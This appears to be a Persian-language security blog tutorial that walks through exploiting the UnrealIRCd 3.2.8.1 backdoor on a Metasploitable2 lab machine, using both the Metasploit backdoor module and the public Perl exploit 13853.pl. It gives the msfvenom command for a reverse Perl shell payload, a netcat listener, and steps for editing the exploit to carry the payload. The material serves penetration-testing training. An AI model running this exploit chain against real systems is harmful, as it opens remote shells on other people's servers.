بهره برداری از UnreaIIRCd 3.2.8.1 با استفاده از متاسپلویت و اسکریپت پرل

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است 

UnrealIRCd یک IRC daemon منبع باز است و در اصل مبتنی بر DreamForge است که برای سیستم عامل های مشابه یونیکس و ویندوز در دسترس می باشد. از زمان شروع توسعه آن که در حدود UnrealIRCd در مه ۱۹۹۹ بوده، بسیاری از ویژگی های جدید از جمله ویژگی های امنیتی پیشرفته و رفع اشکال به آن اضافه یا اصلاح شده است ، و همین امر موجب شده که به یک سرور محبوب تبدیل شود.

بهره برداری از UnreaIIRCd 3.2.8.1 با استفاده از METASPLOIT
چارچوب Metasploit را با نوشتن فرمان “msfconsole” در ترمینال خود آغاز کنید.

برای بهره برداری از سرویس Daemon IRC از اکسپلویت زیر استفاده کنید:

Command: use exploit/unix/irc/unreal_ircd_3281_backdoor

در گام بعدی با وارد کردن فرمان “show options” می توانید همه گزینه های موجود را مشاهده کنید:

irc exploit

اکنون هدف را با کمک “<set RHOST <your-target-ip” مانند تصویر زیر تنظیم کنید:

متاسپلویت

اکنون در اینجا می توانید مشاهده کنید که ۱ جلسه کامند شل باز شده است و می توانید تمام دستورات مربوط به یونیکس را در برابر دستگاه هدف اجرا کنید.

command shell

بهره برداری با استفاده از اسکریپت پرل Perl Script
همین کار را می توان با کمک perl script انجام داد اما قبل از آن باید مطمئن شوید که ابزار wget  در دستگاه هدف نصب باشد وگرنه این بهره برداری کار نخواهد کرد.

از دستور زیر استفاده کنید تا با استفاده از msfvenom که یکی از محبوبترین تولیدکننده پیلود است، بتوانید اسکریپت زبان perl را تولید کنید :

Command: msfvenom -p cmd/unix/reverse_perl LHOST=192.168.169.130 LPORT=4444 -f raw

آی پی ۱۹۲٫۱۶۸٫۱۶۹٫۱۳۰ به دستگاه مورد استفاده (Kali Linux) تعلق دارد و cmd / unix / reverse_perl از نوع payload است.

 

در اینجا می توانید مشاهده کنید که یک خروجی به زبان پرل تولید شده است و همان پیلود را نیز تست می کند ، کد perl را در ترمینال جدید اجرا کنید و با استفاده از ابزار netcat همانطور که در زیر آمده است ، پورت ۴۴۴۴ را در حالت listen قرار دهید:

Command: nc -lvp 4444

 

Exploit

در اینجا می بینید که یک اتصال معکوس در ترمینال netcat باز شده است و  می توانید تمام دستورات مربوط به یونیکس را اجرا کنید.

اکنون بیایید بیشتر به کار خود ادامه دهیم و اکسپلویت اصلی (۱۳۸۵۳٫pl) را ویرایش کنیم. برای این کار می توان به راحتی با استفاده از فرمان “locate 13853.pl” جستجو کرده و از آن در فهرست root/ استفاده کنید.

آموزش اکسپلویت کردن

در مرحله بعد ، فایل ۱۳۸۵۳٫pl را با استفاده از یک ویرایشگر باز کنید و کد زیر را با کد پیلود خود که با msfvenom تولید کردیم ، تغییر دهید.

توجه: حتما از علائم نقل قول تکی حاوی شل کد معکوس Perl با یک backslash استفاده کنید. همچنین می توانید پیلودهای دیگر (payload2 $ ، $ payload3 ، $ payload4 ، $ payload5) را حذف کنید تا از اشتباهات با پیامدهای ناخواسته جلوگیری کنید.

shell perl

اکنون که بهره برداری ما ,ویرایش شده و می دانیم چه چیزی قرار است اجرا شود، زمان آن رسیده تا با تایپ دستور زیر ، اکسپلویت خود را در دستگاه Metasploiable2 شروع کنیم:

Command: perl 13853.pl <target-ip> <port> <payload number>

لینوکس اکسپلوست

 

 

گردآورده : سید محمد اسماعیلی

 

نوشته های مرتبط

Shell Meterpreter در متاسپلویت

۲۸

مرداد
همه موضوعات

ارتقاء فرمان Shell به Shell Meterpreter در متاسپلویت

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است چارچوب Metasploit شامل مجموعه ابزارهایی است که می توانید از آنها برای تست آسیب پذیری های امنیتی ، شمارش شبکه ها ، اجرای حملات و جلوگیری از شناسایی استفاده کنید. یکی از بهترین ویژگی های فریم ورک متاسپلویت Metasploit این است که می توانید پس […]

امنیت سرور ssh

۱۹

مرداد
همه موضوعات

سند امنیت در سرور OpenSSH – چک لیست امنیتی OpenSSh

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است OpenSSH اجرای پروتکل SSH است و به دلیل امنیت بالا برای ریموت لاگین ، ایجاد پشتیبان ، انتقال فایل از راه دور از طریق scp یا sftp و موارد دیگر توصیه می شود. SSH جهت حفظ محرمانگی و یکپارچگی داده های تبادل شده بین دو شبکه[…]